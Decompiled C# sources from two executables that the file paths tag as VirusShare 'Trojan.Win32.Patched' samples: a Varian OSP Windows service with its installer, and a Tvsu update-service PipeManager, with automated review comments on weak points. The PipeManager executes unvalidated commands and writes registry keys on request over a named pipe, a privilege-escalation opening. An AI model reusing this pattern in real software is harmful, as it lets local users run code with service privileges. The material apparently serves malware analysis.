<Compile Include="Concrete\ConcreteServicesSetup.cs" />
<Compile Include="Concrete\Maintenance\Maintenance.cs" />
<Compile Include="Concrete\PlatformServiceController\PlatformServiceController.cs" />
<Compile Include="Concrete\Inventory\InventoryUpdate.cs" />
<Compile Include="Concrete\Inventory\InventoryReplicator.cs" />
<Compile Include="VMS\OSP\Properties\Settings.cs" />
<Compile Include="VMS\OSP\Inventory\Inventory.cs" />
<Compile Include="AssemblyInfo.cs" />
</ItemGroup>
<ItemGroup>
<EmbeddedResource Include="VMSOSPService.resx" />
<EmbeddedResource Include="VMSOSPServiceInstaller.resx" />
</ItemGroup>
<Import Project="$(MSBuildBinPath)\Microsoft.CSharp.targets" />
</Project>
@@ -0,0 +1,20 @@
Microsoft Visual Studio Solution File, Format Version 9.00
# Visual Studio 2005
Project("{FAE04EC0-301F-11D3-BF4B-00C04F79EFBC}") = "VMS.OSP.Service", "Trojan.Win32.Patched.mf-06a1c79ea1bf078d9f5816243d6887697530720ed581c2975d99154e2a24648f.csproj", "{3933AEB5-C476-4FA9-875F-0DE64DF43C30}"
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Any CPU = Debug|Any CPU
Release|Any CPU = Release|Any CPU
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{3933AEB5-C476-4FA9-875F-0DE64DF43C30}.Debug|Any CPU.ActiveCfg = Debug|Any CPU
{3933AEB5-C476-4FA9-875F-0DE64DF43C30}.Debug|Any CPU.Build.0 = Debug|Any CPU
{3933AEB5-C476-4FA9-875F-0DE64DF43C30}.Release|Any CPU.ActiveCfg = Release|Any CPU
{3933AEB5-C476-4FA9-875F-0DE64DF43C30}.Release|Any CPU.Build.0 = Release|Any CPU
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal
@@ -0,0 +1,50 @@
// Decompiled with JetBrains decompiler
// Type: VMS.OSP.Inventory.Inventory
// Assembly: VMS.OSP.Service, Version=1.4.2.0, Culture=neutral, PublicKeyToken=null
// MVID: 7B29B897-26BF-407B-B0D0-14253383A174
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Patched.mf-06a1c79ea1bf078d9f5816243d6887697530720ed581c2975d99154e2a24648f.exe
using System;
using System.ComponentModel;
using System.Configuration;
using System.Diagnostics;
using System.Web.Services;
using System.Web.Services.Description;
using System.Web.Services.Protocols;
namespace VMS.OSP.Inventory
{
[WebServiceBinding(Name = "InventorySoap", Namespace = "http://varian.com/vms.osp.webservices/2006/03/inventory.asmx")]
[DebuggerStepThrough]
[DesignerCategory("code")]
public class Inventory : SoapHttpClientProtocol
{
public Inventory()
{
string appSetting = ConfigurationManager.AppSettings["VMS.OSP.Service.Inventory.Inventory"];
if (appSetting != null)
this.Url = appSetting + "";
else
this.Url = "http://localhost/OSPServices/Inventory.asmx";
}
[SoapDocumentMethod("http://varian.com/vms.osp.webservices/2006/03/inventory.asmx/MergeLocalInventory", ParameterStyle = SoapParameterStyle.Wrapped, RequestNamespace = "http://varian.com/vms.osp.webservices/2006/03/inventory.asmx", ResponseNamespace = "http://varian.com/vms.osp.webservices/2006/03/inventory.asmx", Use = SoapBindingUse.Literal)]
public bool MergeLocalInventory(InventoryDataSet clientInventoryDS) => (bool) this.Invoke(nameof (MergeLocalInventory), new object[1]
{
(object) clientInventoryDS
})[0];
public IAsyncResult BeginMergeLocalInventory(
InventoryDataSet clientInventoryDS,
AsyncCallback callback,
object asyncState)
{
return this.BeginInvoke("MergeLocalInventory", new object[1]
{
(object) clientInventoryDS
}, callback, asyncState);
}
public bool EndMergeLocalInventory(IAsyncResult asyncResult) => (bool) this.EndInvoke(asyncResult)[0];
}
}
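Review bot: The `Inventory()` constructor assigns the `VMS.OSP.Service.Inventory.Inventory` app setting to `Url` without any check, and its fallback is a cleartext `http://` address, so `MergeLocalInventory` posts the inventory dataset with no transport protection and to whatever host the config file names. Anyone who can edit that config can redirect the data, so I would parse the value with `Uri.TryCreate(appSetting, UriKind.Absolute, out uri)` and accept it only when `uri.Scheme == Uri.UriSchemeHttps || uri.IsLoopback`. This class looks like a generated web-reference proxy, so the check may belong in the code that constructs it rather than here. The fallback `http://localhost/OSPServices/Inventory.asmx` also disagrees with the `DefaultSettingValue` in `VMS\OSP\Properties\Settings.cs` (`http://localhost:4254/OSPServices/Inventory.asmx`); one of the two is probably stale.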
@@ -0,0 +1,28 @@
// Decompiled with JetBrains decompiler
// Type: VMS.OSP.Properties.Settings
// Assembly: VMS.OSP.Service, Version=1.4.2.0, Culture=neutral, PublicKeyToken=null
// MVID: 7B29B897-26BF-407B-B0D0-14253383A174
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Patched.mf-06a1c79ea1bf078d9f5816243d6887697530720ed581c2975d99154e2a24648f.exe
using System.CodeDom.Compiler;
using System.Configuration;
using System.Diagnostics;
using System.Runtime.CompilerServices;
namespace VMS.OSP.Properties
{
[CompilerGenerated]
[GeneratedCode("Microsoft.VisualStudio.Editors.SettingsDesigner.SettingsSingleFileGenerator", "8.0.0.0")]
internal sealed class Settings : ApplicationSettingsBase
{
private static Settings defaultInstance = (Settings) SettingsBase.Synchronized((SettingsBase) new Settings());
public static Settings Default => Settings.defaultInstance;
[SpecialSetting(SpecialSetting.WebServiceUrl)]
[DefaultSettingValue("http://localhost:4254/OSPServices/Inventory.asmx")]
[ApplicationScopedSetting]
[DebuggerNonUserCode]
public string VMS_OSP_Service_Inventory_Inventory => (string) this[nameof (VMS_OSP_Service_Inventory_Inventory)];
}
}
@@ -0,0 +1,70 @@
// Decompiled with JetBrains decompiler
// Type: VMS.OSService.VMSOSPService
// Assembly: VMS.OSP.Service, Version=1.4.2.0, Culture=neutral, PublicKeyToken=null
// MVID: 7B29B897-26BF-407B-B0D0-14253383A174
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Patched.mf-06a1c79ea1bf078d9f5816243d6887697530720ed581c2975d99154e2a24648f.exe
using System;
using System.ComponentModel;
using System.ServiceProcess;
using VMS.OSService.Concrete;
namespace VMS.OSService
{
public class VMSOSPService : ServiceBase
{
private Container components;
private ConcreteServicesSetup _services;
public VMSOSPService()
{
this.InitializeComponent();
this.ServiceName = "Varian OSP Service";
this.CanPauseAndContinue = false;
this.CanShutdown = false;
this.CanStop = true;
this.CanHandlePowerEvent = false;
this.AutoLog = false;
this._services = new ConcreteServicesSetup(this.EventLog);
}
private void InitializeComponent()
{
this.components = new Container();
this.ServiceName = "Varian OSP Service";
}
protected override void Dispose(bool disposing)
{
if (disposing && this.components != null)
this.components.Dispose();
base.Dispose(disposing);
}
protected override void OnStart(string[] args)
{
this._services.StartAll(args);
try
{
this.EventLog.WriteEntry(string.Format("{0} started.", (object) "Varian OSP Service"));
}
catch (Exception ex)
{
}
}
protected override void OnStop()
{
this._services.StopAll();
try
{
this.EventLog.WriteEntry(string.Format("{0} stopped.", (object) "Varian OSP Service"));
}
catch (Exception ex)
{
}
}
protected override void OnCustomCommand(int command) => this._services.CustomCommandToAll(command);
}
}
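Review bot: In `OnStart`, `this._services.StartAll(args)` runs outside the `try`, and the only guarded statement is the `EventLog.WriteEntry` call, whose `catch (Exception ex)` is empty; `OnStop` has the same shape around `StopAll()`. The constructor sets `AutoLog = false`, so nothing in this class records a component that failed to start or stop, and a broken start is hard to reconstruct afterwards. I would move the call into the guarded region and log before rethrowing, e.g. `catch (Exception ex) { this.EventLog.WriteEntry(ex.ToString(), EventLogEntryType.Error); throw; }`. If ignoring a failed log write is intended, the empty catch should say so: `// best effort: a failed event-log write must not fail the service`.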
@@ -0,0 +1,120 @@
<?xml version="1.0" encoding="utf-8"?>
<root>
<!--
Microsoft ResX Schema
Version 2.0
The primary goals of this format is to allow a simple XML format
that is mostly human readable. The generation and parsing of the
various data types are done through the TypeConverter classes
associated with the data types.
Example:
... ado.net/XML headers & schema ...
<resheader name="resmimetype">text/microsoft-resx</resheader>
<resheader name="version">2.0</resheader>
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
<value>[base64 mime encoded serialized .NET Framework object]</value>
</data>
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
<comment>This is a comment</comment>
</data>
There are any number of "resheader" rows that contain simple
name/value pairs.
Each data row contains a name, and value. The row also contains a
type or mimetype. Type corresponds to a .NET class that support
text/value conversion through the TypeConverter architecture.
Classes that don't support this are serialized and stored with the
mimetype set.
The mimetype is used for serialized objects, and tells the
ResXResourceReader how to depersist the object. This is currently not
extensible. For a given mimetype the value must be set accordingly:
Note - application/x-microsoft.net.object.binary.base64 is the format
that the ResXResourceWriter will generate, however the reader can
read any of the formats listed below.
mimetype: application/x-microsoft.net.object.binary.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.soap.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.bytearray.base64
value : The object must be serialized into a byte array
: using a System.ComponentModel.TypeConverter
: and then encoded with base64 encoding.
-->
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
<xsd:element name="root" msdata:IsDataSet="true">
<xsd:complexType>
<xsd:choice maxOccurs="unbounded">
<xsd:element name="metadata">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" />
</xsd:sequence>
<xsd:attribute name="name" use="required" type="xsd:string" />
<xsd:attribute name="type" type="xsd:string" />
<xsd:attribute name="mimetype" type="xsd:string" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="assembly">
<xsd:complexType>
<xsd:attribute name="alias" type="xsd:string" />
<xsd:attribute name="name" type="xsd:string" />
</xsd:complexType>
</xsd:element>
<xsd:element name="data">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="resheader">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" />
</xsd:complexType>
</xsd:element>
</xsd:choice>
</xsd:complexType>
</xsd:element>
</xsd:schema>
<resheader name="resmimetype">
<value>text/microsoft-resx</value>
</resheader>
<resheader name="version">
<value>2.0</value>
</resheader>
<resheader name="reader">
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<resheader name="writer">
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
</root>
@@ -0,0 +1,77 @@
// Decompiled with JetBrains decompiler
// Type: VMS.OSService.VMSOSPServiceInstaller
// Assembly: VMS.OSP.Service, Version=1.4.2.0, Culture=neutral, PublicKeyToken=null
// MVID: 7B29B897-26BF-407B-B0D0-14253383A174
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Patched.mf-06a1c79ea1bf078d9f5816243d6887697530720ed581c2975d99154e2a24648f.exe
using Microsoft.Win32;
using System;
using System.ComponentModel;
using System.Configuration.Install;
using System.ServiceProcess;
namespace VMS.OSService
{
[RunInstaller(true)]
public class VMSOSPServiceInstaller : Installer
{
private ServiceProcessInstaller serviceProcessInstaller1;
private ServiceInstaller serviceInstaller1;
private Container components;
public VMSOSPServiceInstaller()
{
this.InitializeComponent();
this.serviceInstaller1.ServiceName = "Varian OSP Service";
this.serviceInstaller1.DisplayName = "Varian OSP Service";
this.serviceInstaller1.StartType = ServiceStartMode.Automatic;
this.AfterInstall += new InstallEventHandler(this.VMSServiceInstaller_AfterInstall);
}
protected override void Dispose(bool disposing)
{
if (disposing && this.components != null)
this.components.Dispose();
base.Dispose(disposing);
}
private void InitializeComponent()
{
this.serviceProcessInstaller1 = new ServiceProcessInstaller();
this.serviceInstaller1 = new ServiceInstaller();
this.serviceProcessInstaller1.Account = ServiceAccount.LocalSystem;
this.serviceProcessInstaller1.Password = (string) null;
this.serviceProcessInstaller1.Username = (string) null;
this.serviceInstaller1.DisplayName = "Varian OSP Service";
this.serviceInstaller1.ServiceName = "Varian OSP Service";
this.serviceInstaller1.StartType = ServiceStartMode.Automatic;
this.Installers.AddRange(new Installer[2]
{
(Installer) this.serviceProcessInstaller1,
(Installer) this.serviceInstaller1
});
}
private void VMSServiceInstaller_AfterInstall(object sender, InstallEventArgs e)
{
try
{
string name = "SYSTEM\\CurrentControlSet\\Services\\Varian OSP Service";
using (RegistryKey registryKey = Registry.LocalMachine.OpenSubKey(name, true))
registryKey?.SetValue("Description", (object) "Controls software inventory and OSP maintenance.");
}
catch (Exception ex)
{
}
try
{
string name = "SYSTEM\\CurrentControlSet\\Control\\";
using (RegistryKey registryKey = Registry.LocalMachine.OpenSubKey(name, true))
registryKey?.SetValue("ServicesPipeTimeout", (object) 200000, RegistryValueKind.DWord);
}
catch (Exception ex)
{
}
}
}
}
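Review bot: `VMSServiceInstaller_AfterInstall` writes `ServicesPipeTimeout` = 200000 under `SYSTEM\CurrentControlSet\Control\`, a machine-wide setting that changes the start timeout for every service on the host, and both registry writes sit in `try` blocks whose `catch (Exception ex)` is empty. Nothing visible in this class saves the previous value, restores it on uninstall, or records that it was changed, so the modification is silent for an administrator and for anyone reviewing the host later. If the longer timeout is required, I would log the old and new value and put a comment above the write, e.g. `// Machine-wide SCM start timeout in ms; affects all services, not only "Varian OSP Service"`. `InitializeComponent` also installs the service under `ServiceAccount.LocalSystem`; if the components' service-control and registry needs allow it, a dedicated lower-privileged account would limit what a compromise of this process gives.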
@@ -0,0 +1,148 @@
<?xml version="1.0" encoding="utf-8"?>
<root>
<!--
Microsoft ResX Schema
Version 2.0
The primary goals of this format is to allow a simple XML format
that is mostly human readable. The generation and parsing of the
various data types are done through the TypeConverter classes
associated with the data types.
Example:
... ado.net/XML headers & schema ...
<resheader name="resmimetype">text/microsoft-resx</resheader>
<resheader name="version">2.0</resheader>
<resheader name="reader">System.Resources.ResXResourceReader, System.Windows.Forms, ...</resheader>
<resheader name="writer">System.Resources.ResXResourceWriter, System.Windows.Forms, ...</resheader>
<data name="Name1"><value>this is my long string</value><comment>this is a comment</comment></data>
<data name="Color1" type="System.Drawing.Color, System.Drawing">Blue</data>
<data name="Bitmap1" mimetype="application/x-microsoft.net.object.binary.base64">
<value>[base64 mime encoded serialized .NET Framework object]</value>
</data>
<data name="Icon1" type="System.Drawing.Icon, System.Drawing" mimetype="application/x-microsoft.net.object.bytearray.base64">
<value>[base64 mime encoded string representing a byte array form of the .NET Framework object]</value>
<comment>This is a comment</comment>
</data>
There are any number of "resheader" rows that contain simple
name/value pairs.
Each data row contains a name, and value. The row also contains a
type or mimetype. Type corresponds to a .NET class that support
text/value conversion through the TypeConverter architecture.
Classes that don't support this are serialized and stored with the
mimetype set.
The mimetype is used for serialized objects, and tells the
ResXResourceReader how to depersist the object. This is currently not
extensible. For a given mimetype the value must be set accordingly:
Note - application/x-microsoft.net.object.binary.base64 is the format
that the ResXResourceWriter will generate, however the reader can
read any of the formats listed below.
mimetype: application/x-microsoft.net.object.binary.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Binary.BinaryFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.soap.base64
value : The object must be serialized with
: System.Runtime.Serialization.Formatters.Soap.SoapFormatter
: and then encoded with base64 encoding.
mimetype: application/x-microsoft.net.object.bytearray.base64
value : The object must be serialized into a byte array
: using a System.ComponentModel.TypeConverter
: and then encoded with base64 encoding.
-->
<xsd:schema id="root" xmlns="" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:msdata="urn:schemas-microsoft-com:xml-msdata">
<xsd:import namespace="http://www.w3.org/XML/1998/namespace" />
<xsd:element name="root" msdata:IsDataSet="true">
<xsd:complexType>
<xsd:choice maxOccurs="unbounded">
<xsd:element name="metadata">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" />
</xsd:sequence>
<xsd:attribute name="name" use="required" type="xsd:string" />
<xsd:attribute name="type" type="xsd:string" />
<xsd:attribute name="mimetype" type="xsd:string" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="assembly">
<xsd:complexType>
<xsd:attribute name="alias" type="xsd:string" />
<xsd:attribute name="name" type="xsd:string" />
</xsd:complexType>
</xsd:element>
<xsd:element name="data">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
<xsd:element name="comment" type="xsd:string" minOccurs="0" msdata:Ordinal="2" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" msdata:Ordinal="1" />
<xsd:attribute name="type" type="xsd:string" msdata:Ordinal="3" />
<xsd:attribute name="mimetype" type="xsd:string" msdata:Ordinal="4" />
<xsd:attribute ref="xml:space" />
</xsd:complexType>
</xsd:element>
<xsd:element name="resheader">
<xsd:complexType>
<xsd:sequence>
<xsd:element name="value" type="xsd:string" minOccurs="0" msdata:Ordinal="1" />
</xsd:sequence>
<xsd:attribute name="name" type="xsd:string" use="required" />
</xsd:complexType>
</xsd:element>
</xsd:choice>
</xsd:complexType>
</xsd:element>
</xsd:schema>
<resheader name="resmimetype">
<value>text/microsoft-resx</value>
</resheader>
<resheader name="version">
<value>2.0</value>
</resheader>
<resheader name="reader">
<value>System.Resources.ResXResourceReader, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<resheader name="writer">
<value>System.Resources.ResXResourceWriter, System.Windows.Forms, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089</value>
</resheader>
<data name="serviceProcessInstaller1.Location" mimetype="application/x-microsoft.net.object.binary.base64">
<value>AAEAAAD/////AQAAAAAAAAAMAgAAAFFTeXN0ZW0uRHJhd2luZywgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWIwM2Y1ZjdmMTFkNTBhM2EFAQAAABRTeXN0ZW0uRHJhd2luZy5Qb2ludAIAAAABeAF5AAAICAIAAAARAAAAEQAAAAs=</value>
</data>
<assembly alias="mscorlib" name="mscorlib, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089" />
<data name="$this.TrayLargeIcon" type="System.Boolean, mscorlib">
<value>False</value>
</data>
<data name="$this.Name" xml:space="preserve">
<value>VMSOSPServiceInstaller</value>
</data>
<data name="$this.DefaultModifiers" mimetype="application/x-microsoft.net.object.binary.base64">
<value>AAEAAAD/////AQAAAAAAAAAMAgAAAElTeXN0ZW0sIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BQEAAAAfU3lzdGVtLkNvZGVEb20uTWVtYmVyQXR0cmlidXRlcwEAAAAHdmFsdWVfXwAIAgAAAABQAAAL</value>
</data>
<data name="serviceInstaller1.DefaultModifiers" mimetype="application/x-microsoft.net.object.binary.base64">
<value>AAEAAAD/////AQAAAAAAAAAMAgAAAElTeXN0ZW0sIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BQEAAAAfU3lzdGVtLkNvZGVEb20uTWVtYmVyQXR0cmlidXRlcwEAAAAHdmFsdWVfXwAIAgAAAABQAAAL</value>
</data>
<data name="serviceInstaller1.Modifiers" mimetype="application/x-microsoft.net.object.binary.base64">
<value>AAEAAAD/////AQAAAAAAAAAMAgAAAElTeXN0ZW0sIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BQEAAAAfU3lzdGVtLkNvZGVEb20uTWVtYmVyQXR0cmlidXRlcwEAAAAHdmFsdWVfXwAIAgAAAABQAAAL</value>
</data>
<data name="serviceInstaller1.Location" mimetype="application/x-microsoft.net.object.binary.base64">
<value>AAEAAAD/////AQAAAAAAAAAMAgAAAFFTeXN0ZW0uRHJhd2luZywgVmVyc2lvbj0yLjAuMC4wLCBDdWx0dXJlPW5ldXRyYWwsIFB1YmxpY0tleVRva2VuPWIwM2Y1ZjdmMTFkNTBhM2EFAQAAABRTeXN0ZW0uRHJhd2luZy5Qb2ludAIAAAABeAF5AAAICAIAAAC7AAAAEQAAAAs=</value>
</data>
<data name="serviceProcessInstaller1.DefaultModifiers" mimetype="application/x-microsoft.net.object.binary.base64">
<value>AAEAAAD/////AQAAAAAAAAAMAgAAAElTeXN0ZW0sIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BQEAAAAfU3lzdGVtLkNvZGVEb20uTWVtYmVyQXR0cmlidXRlcwEAAAAHdmFsdWVfXwAIAgAAAABQAAAL</value>
</data>
<data name="serviceProcessInstaller1.Modifiers" mimetype="application/x-microsoft.net.object.binary.base64">
<value>AAEAAAD/////AQAAAAAAAAAMAgAAAElTeXN0ZW0sIFZlcnNpb249Mi4wLjAuMCwgQ3VsdHVyZT1uZXV0cmFsLCBQdWJsaWNLZXlUb2tlbj1iNzdhNWM1NjE5MzRlMDg5BQEAAAAfU3lzdGVtLkNvZGVEb20uTWVtYmVyQXR0cmlidXRlcwEAAAAHdmFsdWVfXwAIAgAAAABQAAAL</value>
</data>
</root>
@@ -0,0 +1,18 @@
// Decompiled with JetBrains decompiler
// Type: VMS.OSService.VMSOSPStartup
// Assembly: VMS.OSP.Service, Version=1.4.2.0, Culture=neutral, PublicKeyToken=null
// MVID: 7B29B897-26BF-407B-B0D0-14253383A174
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00000-msil\Trojan.Win32.Patched.mf-06a1c79ea1bf078d9f5816243d6887697530720ed581c2975d99154e2a24648f.exe
using System.ServiceProcess;
namespace VMS.OSService
{
public class VMSOSPStartup
{
private static void Main() => ServiceBase.Run(new ServiceBase[1]
{
(ServiceBase) new VMSOSPService()
});
}
}
@@ -0,0 +1,3 @@
using System.Reflection;
[assembly: AssemblyVersion("0.0.0.0")]
@@ -0,0 +1,357 @@
// Decompiled with JetBrains decompiler
// Type: Tvsu.Service.Server.PipeManager
// Assembly: SUService, Version=0.0.0.0, Culture=neutral, PublicKeyToken=null
// MVID: C794206D-ECC0-4CFA-AB4E-5C06FB2FD4CC
// Assembly location: C:\Users\Administrateur\Downloads\Virusshare-00001-msil\Trojan.Win32.Patched.mf-57a055e0e8642f449b4d27fa8ff9cbc0f8367d8cdd69ab6deeca9a801697bce1.exe
using Microsoft.Win32;
using System;
using System.Collections;
using System.Diagnostics;
using System.Globalization;
using System.IO;
using System.Runtime.InteropServices;
using System.Threading;
using Tvsu.Service.Common.InterProcessComm;
using Tvsu.Service.Common.NamedPipes;
using Tvsu.Service.Common.Util;
namespace Tvsu.Service.Server
{
public sealed class PipeManager : IChannelManager
{
private const string UNINSTALL = "/u";
private const string EXECUTE = "/execute";
private const string DIR = "/directory";
private const string ARGUMENTS = "/arguments";
private const string INSTALL_TYPE = "/type";
private const string PIPE_SERVER_NAME = "SUPipeServer";
private const int MAX_READ_BYTES = 5000;
private const int PIPE_MAX_STUFFED_TIME = 5000;
private static string commandLine = (string) null;
private static string argumentsValue = (string) null;
private static string directoryPath = (string) null;
private static string installType = (string) null;
[MarshalAs(UnmanagedType.LPStr)]
private string hardwareId;
[MarshalAs(UnmanagedType.LPStr)]
private string infFilePath;
public Hashtable Pipes;
private uint NumberPipes = 5;
private uint OutBuffer = 512;
private uint InBuffer = 512;
private bool _listen = true;
private int numChannels = 0;
private Hashtable _pipes = new Hashtable();
private Thread MainThread;
private string PipeName = "SUPipeServer";
private ManualResetEvent Mre;
public object SyncRoot = new object();
[DllImport("tools.dll")]
public static extern bool updateDriverForPlugAndPlayDevices(
string hardwareId,
string fullInfPath);
[DllImport("tools.dll")]
public static extern string GetError();
public bool Listen
{
get => this._listen;
set => this._listen = value;
}
public void Initialize()
{
this.Pipes = Hashtable.Synchronized(this._pipes);
this.Mre = new ManualResetEvent(false);
this.MainThread = new Thread(new ThreadStart(this.Start));
this.MainThread.IsBackground = false;
this.MainThread.Name = "Main Pipe Thread";
this.MainThread.Start();
Thread.Sleep(1000);
}
public string HandleRequest(string request)
{
string str = request;
try
{
ServiceLogger.Instance.Info(request);
PipeManager.commandLine = "";
PipeManager.argumentsValue = "";
PipeManager.directoryPath = "";
PipeManager.installType = "";
PipeManager.BuildCommandLine(str.Split(' '));
ServiceLogger.Instance.Info(PipeManager.directoryPath + Environment.NewLine + PipeManager.commandLine + Environment.NewLine + PipeManager.argumentsValue + Environment.NewLine + PipeManager.installType);
}
catch (Exception ex)
{
ServiceLogger.Instance.Severe("Error handling request", ex);
}
return this.ExecuteCommand(PipeManager.directoryPath, PipeManager.commandLine, PipeManager.argumentsValue, PipeManager.installType).ToString();
}
private int ExecuteCommand(string dir, string cmd, string args, string _installType)
{
int num = int.MinValue;
string path = "";
try
{
ServiceLogger.Instance.Info("Directory 1: " + dir);
if (PipeManager.DirectoryExists(dir))
path = dir;
ServiceLogger.Instance.Info("If directory 1 exists: " + path);
switch (_installType)
{
case "":
case null:
_installType = "COMMAND";
break;
}
if (_installType == PipeManager.InstallType.INF.ToString())
{
this.infFilePath = cmd;
Directory.SetCurrentDirectory(path);
this.hardwareId = args;
return PipeManager.updateDriverForPlugAndPlayDevices(this.hardwareId, this.infFilePath) ? 1 : 0;
}
Process process = new Process();
ProcessStartInfo processStartInfo = new ProcessStartInfo();
if (File.Exists(path + "\\" + cmd))
processStartInfo.WorkingDirectory = path;
else if (File.Exists(path + "\\" + cmd.Substring(cmd.LastIndexOf("\\") + 1, cmd.Length - 1 - cmd.LastIndexOf("\\"))))
{
processStartInfo.WorkingDirectory = path;
cmd = cmd.Substring(cmd.LastIndexOf("\\") + 1, cmd.Length - 1 - cmd.LastIndexOf("\\"));
}
else if (File.Exists(cmd))
{
path = cmd.Substring(0, cmd.LastIndexOf("\\"));
cmd = cmd.Substring(cmd.LastIndexOf("\\") + 1, cmd.Length - 1 - cmd.LastIndexOf("\\"));
processStartInfo.WorkingDirectory = path;
}
ServiceLogger.Instance.Info("The parameters directory and command stay as follows:" + Environment.NewLine + "command: " + cmd + Environment.NewLine + "directory: " + path);
switch (args)
{
case "":
case null:
processStartInfo.FileName = cmd;
break;
default:
processStartInfo.FileName = cmd;
processStartInfo.Arguments = args;
break;
}
if (string.Compare(cmd, "egather2.exe", true, new CultureInfo("en-US", false)) == 0)
{
processStartInfo.WindowStyle = ProcessWindowStyle.Hidden;
ServiceLogger.Instance.Info("Type hidden");
}
else
{
processStartInfo.WindowStyle = ProcessWindowStyle.Normal;
ServiceLogger.Instance.Info("Type normal");
}
if (_installType == PipeManager.InstallType.SHELL.ToString())
processStartInfo.UseShellExecute = true;
process.StartInfo = processStartInfo;
process.Start();
while (!process.HasExited)
process.WaitForExit();
num = process.ExitCode;
}
catch (Exception ex)
{
ServiceLogger.Instance.Severe("Error executing command: " + cmd, ex);
}
return num;
}
private int WriteRegistryValue(string dir, string svalue)
{
string root = dir.Substring(0, dir.IndexOf("\\"));
string str = dir.Substring(dir.IndexOf("\\") + 1, dir.LastIndexOf("\\") - dir.IndexOf("\\"));
string name = dir.Substring(dir.LastIndexOf("\\") + 1, dir.Length - dir.LastIndexOf("\\") - 1);
RegistryKey registryKey = PipeManager.GetRegistryKey(root);
if (registryKey == null)
return int.MinValue;
if (registryKey.OpenSubKey(str) != null)
{
if (svalue == null)
svalue = "";
registryKey.OpenSubKey(str, true).SetValue(name, (object) svalue);
}
else
{
ServiceLogger.Instance.Info("Creating sub Key: " + str);
registryKey.CreateSubKey(str);
registryKey.OpenSubKey(str, true).SetValue(name, (object) svalue);
}
registryKey.Close();
return 0;
}
public static RegistryKey GetRegistryKey(string root)
{
RegistryKey registryKey = (RegistryKey) null;
switch (root)
{
case "HKEY_CLASSES_ROOT":
registryKey = Registry.ClassesRoot;
break;
case "HKEY_CURRENT_USER":
registryKey = Registry.CurrentUser;
break;
case "HKEY_LOCAL_MACHINE":
registryKey = Registry.LocalMachine;
break;
case "HKEY_USERS":
registryKey = Registry.Users;
break;
case "HKEY_CURRENT_CONFIG":
registryKey = Registry.CurrentConfig;
break;
}
return registryKey;
}
